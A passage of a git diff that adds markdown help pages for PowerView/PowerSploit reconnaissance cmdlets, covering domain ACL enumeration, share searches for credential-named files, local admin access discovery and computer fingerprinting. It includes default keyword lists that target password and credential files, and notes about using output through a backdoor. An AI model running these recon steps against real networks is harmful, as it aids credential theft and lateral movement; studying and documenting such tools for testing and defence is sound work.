ACLs for every object in the domain with Get-DomainObjectAcl, +and for each returned ACE entry it checks if principal security identifier +is *-1000 (meaning the account is not built in), and also checks if the rights for +the ACE mean the object can be modified by the principal. +If these conditions are met, +then the security identifier SID is translated, the domain object is retrieved, and +additional IdentityReference* information is appended to the output object. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingDomainAcl +``` + +Finds interesting object ACLS in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs +``` + +Finds interesting object ACLS in the ev.testlab.local domain and +resolves rights GUIDs to display names. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveGUIDs +Switch. +Resolve GUIDs to their display names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsFilter +{{Fill RightsFilter Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ACL + +Custom PSObject with ACL entries. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md new file mode 100755 index 0000000..511510f --- /dev/null +++ b/docs/Recon/Find-InterestingDomainShareFile.md @@ -0,0 +1,463 @@ +# Find-InterestingDomainShareFile + +## SYNOPSIS +Searches for files matching specific criteria on readable shares +in the domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction + +## SYNTAX + +### FileSpecification (Default) +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-Include ] [-SharePath ] + [-ExcludedShares ] [-LastAccessTime ] [-LastWriteTime ] + [-CreationTime ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-Delay ] [-Jitter ] + [-Threads ] +``` + +### OfficeDocs +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-SharePath ] + [-ExcludedShares ] [-OfficeDocs] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +### FreshEXEs +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-SharePath ] + [-ExcludedShares ] [-FreshEXEs] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-Delay ] [-Jitter ] + [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. +It will then use Find-InterestingFile on each +readhable share, searching for files marching specific criteria. +If -Credential +is passed, then Invoke-UserImpersonation is used to impersonate the specified +user before enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingDomainShareFile +``` + +Finds 'interesting' files on the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local') +``` + +Finds 'interesting' files on readable shares on the specified systems. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches interesting files in the testlab.local domain using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Include +Only return files/folders that match the specified array of strings, +i.e. +@(*.doc*, *.xls*, *.ppt*) + +```yaml +Type: String[] +Parameter Sets: FileSpecification +Aliases: SearchTerms, Terms + +Required: False +Position: Named +Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SharePath +Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Share + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludedShares +Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: @('C$', 'Admin$', 'Print$', 'IPC$') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastAccessTime +Only return files with a LastAccessTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastWriteTime +Only return files with a LastWriteTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CreationTime +Only return files with a CreationTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OfficeDocs +Switch. +Search for office documents (*.doc*, *.xls*, *.ppt*) + +```yaml +Type: SwitchParameter +Parameter Sets: OfficeDocs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FreshEXEs +Switch. +Find .EXEs accessed within the last 7 days. + +```yaml +Type: SwitchParameter +Parameter Sets: FreshEXEs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.FoundFile + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md new file mode 100755 index 0000000..2fe6abf --- /dev/null +++ b/docs/Recon/Find-InterestingFile.md @@ -0,0 +1,248 @@ +# Find-InterestingFile + +## SYNOPSIS +Searches for files on the given path that match a series of specified criteria. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection + +## SYNTAX + +### FileSpecification (Default) +``` +Find-InterestingFile [[-Path] ] [-Include ] [-LastAccessTime ] + [-LastWriteTime ] [-CreationTime ] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess] + [-Credential ] +``` + +### OfficeDocs +``` +Find-InterestingFile [[-Path] ] [-OfficeDocs] [-CheckWriteAccess] [-Credential ] +``` + +### FreshEXEs +``` +Find-InterestingFile [[-Path] ] [-FreshEXEs] [-CheckWriteAccess] [-Credential ] +``` + +## DESCRIPTION +This function recursively searches a given UNC path for files with +specific keywords in the name (default of pass, sensitive, secret, admin, +login and unattend*.xml). +By default, hidden files/folders are included +in search results. +If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection +is used to temporarily map the remote share. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingFile -Path "C:\Backup\" +``` + +Returns any files on the local path C:\Backup\ that have the default +search term set in the title. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7) +``` + +Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default +search term set in the title and were accessed within the last week. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\" + +## PARAMETERS + +### -Path +UNC/local path to recursively search. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: .\ +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Include +Only return files/folders that match the specified array of strings, +i.e. +@(*.doc*, *.xls*, *.ppt*) + +```yaml +Type: String[] +Parameter Sets: FileSpecification +Aliases: SearchTerms, Terms + +Required: False +Position: Named +Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastAccessTime +Only return files with a LastAccessTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastWriteTime +Only return files with a LastWriteTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CreationTime +Only return files with a CreationTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OfficeDocs +Switch. +Search for office documents (*.doc*, *.xls*, *.ppt*) + +```yaml +Type: SwitchParameter +Parameter Sets: OfficeDocs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FreshEXEs +Switch. +Find .EXEs accessed within the last 7 days. + +```yaml +Type: SwitchParameter +Parameter Sets: FreshEXEs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeFolders +Switch. +Exclude folders from the search results. + +```yaml +Type: SwitchParameter +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeHidden +Switch. +Exclude hidden files and folders from the search results. + +```yaml +Type: SwitchParameter +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckWriteAccess +Switch. +Only returns files the current user has write access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +to connect to remote systems for file enumeration. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.FoundFile + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md new file mode 100755 index 0000000..f3e3b6f --- /dev/null +++ b/docs/Recon/Find-LocalAdminAccess.md @@ -0,0 +1,337 @@ +# Find-LocalAdminAccess + +## SYNOPSIS +Finds machines on the local domain where the current user has local administrator access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction + +## SYNTAX + +``` +Find-LocalAdminAccess [[-ComputerName] ] [-ComputerDomain ] [-ComputerLDAPFilter ] + [-ComputerSearchBase ] [-ComputerOperatingSystem ] [-ComputerServicePack ] + [-ComputerSiteName ] [-CheckShareAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and for each computer it checks if the current user +has local administrator access using Test-AdminAccess. +If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +Idea adapted from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-LocalAdminAccess +``` + +Finds machines in the current domain the current user has admin access to. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-LocalAdminAccess -Domain dev.testlab.local +``` + +Finds machines in the dev.testlab.local domain the current user has admin access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-LocalAdminAccess -Domain testlab.local -Credential $Cred + +Finds machines in the testlab.local domain that the user with the specified -Credential +has admin access to. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckShareAccess +Switch. +Only display found shares that the local user has access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +Computer dnshostnames the current user has administrative access to. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ComputerDetails.md b/docs/Recon/Get-ComputerDetails.md new file mode 100755 index 0000000..6bc3e91 --- /dev/null +++ b/docs/Recon/Get-ComputerDetails.md @@ -0,0 +1,68 @@ +# Get-ComputerDetails + +## SYNOPSIS +This script is used to get useful information from a computer. + +Function: Get-ComputerDetails +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-ComputerDetails [-ToString] +``` + +## DESCRIPTION +This script is used to get useful information from a computer. +Currently, the script gets the following information: +-Explicit Credential Logons (Event ID 4648) +-Logon events (Event ID 4624) +-AppLocker logs to find what processes are created +-PowerShell logs to find PowerShell scripts which have been executed +-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ComputerDetails +``` + +Gets information about the computer and outputs it as PowerShell objects. + +Get-ComputerDetails -ToString +Gets information about the computer and outputs it as raw text. + +## PARAMETERS + +### -ToString +Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. +You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. + +## RELATED LINKS + +[Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell) + diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md new file mode 100755 index 0000000..aa8098c --- /dev/null +++ b/docs/Recon/Get-Domain.md @@ -0,0 +1,81 @@ +# Get-Domain + +## SYNOPSIS +Returns the domain object for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-Domain [[-Domain] ] [-Credential ] +``` + +## DESCRIPTION +Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current +domain or the domain specified with -Domain X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Domain -Domain testlab.local +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Domain -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain name to query for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.Domain + +A complex .NET domain object. + +## NOTES + +## RELATED LINKS + +[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG) + diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md new file mode 100755 index 0000000..562f769 --- /dev/null +++ b/docs/Recon/Get-DomainComputer.md @@ -0,0 +1,426 @@ +# Get-DomainComputer + +## SYNOPSIS +Return all computers or specific computer objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainComputer [[-Identity] ] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN ] + [-OperatingSystem ] [-ServicePack ] [-SiteName ] [-Ping] [-Domain ] + [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all computer objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainComputer +``` + +Returns the current computers in current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer -SPN mssql* -Domain testlab.local +``` + +Returns all MS SQL servers in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained +``` + +Search the specified OU for computeres that allow unconstrained delegation. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainComputer -Credential $Cred + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +WINDOWS10$), DistinguishedName (e.g. +CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. +4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. +windows10.testlab.local). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: SamAccountName, Name, DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False 